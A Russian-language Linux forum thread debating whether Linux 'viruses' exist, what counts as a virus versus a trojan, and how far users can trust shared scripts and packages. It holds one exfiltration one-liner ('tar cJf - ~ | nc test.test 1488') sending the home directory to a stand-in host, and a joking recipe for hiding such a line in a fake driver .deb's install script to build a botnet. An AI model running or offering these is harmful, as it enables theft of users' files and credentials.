Вирусы Linux

А что, пользователь не смотрит в те скрипты, которые он выполняет?! Конечно, может быть и такое, что пользователь выполняет не глядя скрипт из источника, которому он доверяет, но в таком случае получается, что источник не оправдал доверия. И уязвимость прежде всего здесь - в неоправданном доверии ненадёжному источнику.

PS.

> ls ~/.ssh/id_rsa.pub
ls: невозможно получить доступ к /home/saahriktu/.ssh/id_rsa.pub: Нет такого файла или каталога
> ls ~/.ssh/
ls: невозможно получить доступ к /home/saahriktu/.ssh/: Нет такого файла или каталога

Ну тогда уж сразу tar cJf - ~ | nc test.test 1488

Компью́терный ви́рус — разновидность компьютерных программ или вредоносный код, отличительным признаком которых является способность к размножению (саморепликация).

а у тебя простой троян/бекдор

1. Запакуй в .deb любой драйвер
2. В скрипт установки впиши данную строчку или любую другую.
3. Назови пакет Radeon3DDriverAMDFixedbyVovan.deb
4. Выложи на убунту-форум с заголовком «Наконец-то безглючный каталист!».
5. ???
6. Ботнет готов.

А что, пользователь не смотрит в те скрипты, которые он выполняет?!

часто по ночам читаешь исходники firefox/xulrunner?

кстати, почему он тормозит?

а у тебя простой троян/бекдор

ну я и писал: «в широком смысле(все что вредоносное, а не то что вирус по определению)?», то часто когда ТС заводят темы о вирусах, то тыкают в определение вируса, хотя ТС изначально хотел сказать о вредоносности а не самовоспроизведению

А что, пользователь не смотрит в те скрипты, которые он выполняет?!

Можно ведь скрипт спрятать внутри чего-нибудь полезного и никак себя не проявлять, вряд ли много кто просматривает весь код, который запускает.

И уязвимость прежде всего здесь - в неоправданном доверии ненадёжному источнику.

Теперь вопрос, как защитить пользователя? Не все пользователи продвинутые, что бы следить за всем.

Вообще-то «исходники» == «скрипты» только для интерпретируемых ЯП, таких как Perl, Python, Ruby,... etc. Firefox написан на компилируемом ЯП. Конечно, уследить за содержимым исходников всего софта задача для одного человека, пожалуй, непосильная, но я говорил про задачу более мелкого масштаба. С помощью скриптов пользователи много что автоматизируют, и их у них не так уж и много, чтобы не знать что и куда они сами написали. Но, пользователи могут делиться друг с другом своими скриптами, и, как я понял, тема прежде всего про это.

А что, пользователь не смотрит в те скрипты, которые он выполняет?!

Э? Тебе показать, как делается многострочный внешне безобидный скрипт, в котором при копипасте будут лишние строчки?

но в таком случае получается, что источник не оправдал доверия.

Напоминаю: ломали даже kernel.org.

ls: невозможно получить доступ к /home/saahriktu/.ssh/: Нет такого файла или каталога

А, ок, тебе можно.

Firefox написан на компилируемом ЯП.

Firefox написан на XUL, который ни разу не компилируем.

Но, пользователи могут делиться друг с другом своими скриптами, и, как я понял, тема прежде всего про это.

Это больше как пример «реализации в лоб». Сюда же можно отнести и исходный код компилируемых программ, у них все те же права на чтение пользовательского каталога.

Теперь вопрос, как защитить пользователя? Не все пользователи продвинутые, что бы следить за всем.

Не тянуть софт и скрипты откуда попало, если не хватает сил и умения их проверять. Тем более, что репозитории многих дистрибутивов уже включают довольно-таки много софта. А сложные пользовательские скрипты лучше писать самим. Простые после проверки вполне можно юзать.

Напоминаю: ломали даже kernel.org.

плюсую

Python, Ruby
интерпретируемых

щито?

Но, пользователи могут делиться друг с другом своими скриптами

напиши тот же самый скрипт на Си и поделись бинарником. Можешь даже вместе с собраным бинарником выслать исходник на Си, всё равно его никто не прочитает.

Нет никакого широкого смысла есть те, кто не знают терминологию.

Нет никакого широкого смысла есть те, кто не знают терминологию.

В этом и заключается широкий смысл

Тогда может оказаться, что этот человек сам и есть вирус (^ ^)

Тогда может оказаться, что этот человек сам и есть вирус (^ ^)

Ну это конечно слишком :) Широкий смысл вируса: трояны, бедоры, сами вирусы, и т д. в общем синоним вредоносного ПО. Ведь слово «хакер», так же в широком употреблении потеряло свой первоначальный смысл

предлагаю тогда компьютер называть процессором

Вспоминается знаменитая лекция.

Однако в настоящее время в сети существует… живут… существуют большое количество разнообразных злоумышленников… двоеточие… хакеры, крекеры, спамы, куки, закладки, троянские кони… ну я не все назвал, достаточно, да…

так же в широком употреблении потеряло свой первоначальный смысл

слово «хакер» широко употребляется? Или под «шириной» ты понимаешь русских эникеев и 1С-одминов?

Wikipedia — не истина в первой инстанции :) Авторы статьи пользуются какой-то левой терминологией, несущей мало смысла. В 1990-х троянские кони были частным случаем вируса.

И, да, биологические вирусы не способны к саморепликции/размножению. Соответственно, глупо делать кластеризацию по этому критерию.

Firefox написан на XUL

Это даже не язык программирования. XUL используется для описания интерфейса.

Wikipedia — не истина в первой инстанции :)
В 1990-х троянские кони были частным случаем вируса.

если вредоносный код не умеет самостоятельно распространяться, то это не компьютерный вирус.

можно ли подобные штуки называть вирусами, в широком смысле(все что вредоносное, а не то что вирус по определению)?

Нет, подменять одни термины другими нельзя.

Хакер — это тот, кто получает удовольствие от игривого остроумия — не обязательно связанного с компьютерами. Программисты в старом сообществе свободного программного обеспечения Массачусетского технического института шестидесятых и семидесятых годов называли себя хакерами. Примерно в 1980 году журналисты, открывшие сообщество хакеров, ошибочно приняли это слово в значении “взломщик систем безопасности”.

Не распространяйте, пожалуйста, этой ошибки. Люди, которые взламывают системы безопасности — это “взломщики”.

http://www.gnu.org/philosophy/words-to-avoid.ru.html

если вредоносный код не умеет самостоятельно распространяться, то это не компьютерный вирус.

Тогда получается «если неклеточный информационный агент не умеет самостоятельно распространятся, то это не биологический вирус». Так как тогда называть этот агент и что тогда такое — [настоящий] вирус? :)

вопрос классификации биологических вирусов меня вообще не интересует

вопрос классификации биологических вирусов меня вообще не интересует

Просто если ты переносишь смысл термина из одной области в другую, то глупо вносить мелкие частичные правки. К тому же, выкидывающие из очевидной близости и хорошо соответствующие семантике исходного термина понятия.

Классификация 1990-х была логична и хорошо отвечала биологической. Но потом в Интернет нагрянула смесь неучей и снобов от вирусописания и терминологию стали перекручивать натягиванием совы на глобус :)

Круто! Это откуда?

Тогда уж правильнее «вредоносное программное обеспечение».

Просто если ты переносишь смысл термина из одной области в другую

не я это перенес.
ну все понятно с тобой, как обычно.

именно

ну все понятно с тобой, как обычно.

Да. Я как обычно не люблю алогичность и бессмыслицу :)

кто то ставит дебы не из репозиториев?

Англичанам хорошо - у них это одно слово, а у нас вон как длинно, видимо потому как-то и не прижился термин у широких масс.

Компьютерные вирусы схожи с биологическими способом размножения - они встраиваются в другое по. А программы которые не встраиввются, но копируют себя - это черви. Так что аналогия сохранена полностью.

Компьютерные вирусы схожи с биологическими способом размножения - они встраиваются в другое по.

В биологии вирус и клетка — совершенно разные сущности. Соответственно, «встраивание» вируса в ПО — не обязательный критерий при переносе термина. Фактически, с биологической точки зрения, вирус _управляет_ средством размножения. Точно такая же история происходит и при распространении троянского коня. Или червя.

Широкий смысл вируса: трояны, бедоры, сами вирусы, и т д. в общем синоним вредоносного ПО

С каких пор незнание терминологии стало называться «широкий смысл»?

Хм, я правильно понимаю, что такие штуки не будут работать в федоре/РХ (если, конечно, seLinux не отключен)?

Почему это не будут? Пользователь сам запускает команду из своей консоли (в которой selinux разрешает всё). Собственно нужный файл читает base64, запущенный интерактивным $SHELL, удачи с составлением политики на такие случаи.

политика запрещено все что не разрешено. Ее впооне можно было бы сделать.

Тогда может оказаться, что этот человек сам и есть вирус (^ ^)

Вспомнилось. Подразумевается нечто немного иное, но если двое приходят к одному и тому же выводу разными дорогами - это что-то может значить.

I'd like to share a revelation during my time here. It came to me when I tried to classify your species. I realized that you're not actually mammals. Every mammal on this planet instinctively develops a natural equilibrium with the surrounding environment but you humans do not. You move to an area and you multiply and multiply until every natural resource is consumed. The only way you can survive is to spread to another area. There is another organism on this planet that follows the same pattern. Do you know what it is? A virus.

кто то ставит дебы не из репозиториев?

Кто-то читает исходники всех установленных дебов из репозитория?

А как оно само распростроняться будет? Тогда уж троян, а не вирус.

http://lurkmore.to/Хакеры,_крекеры,_спамы,_куки

если двое приходят к одному и тому же выводу разными дорогами - это что-то может значить

Две красные таблетки этому господину.

Ты уверен, что тебе нужен id_rsa.pub?

Вирусы есть, и давно, вот тебе пример: https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/commit/a047be85247755c... (трафик!)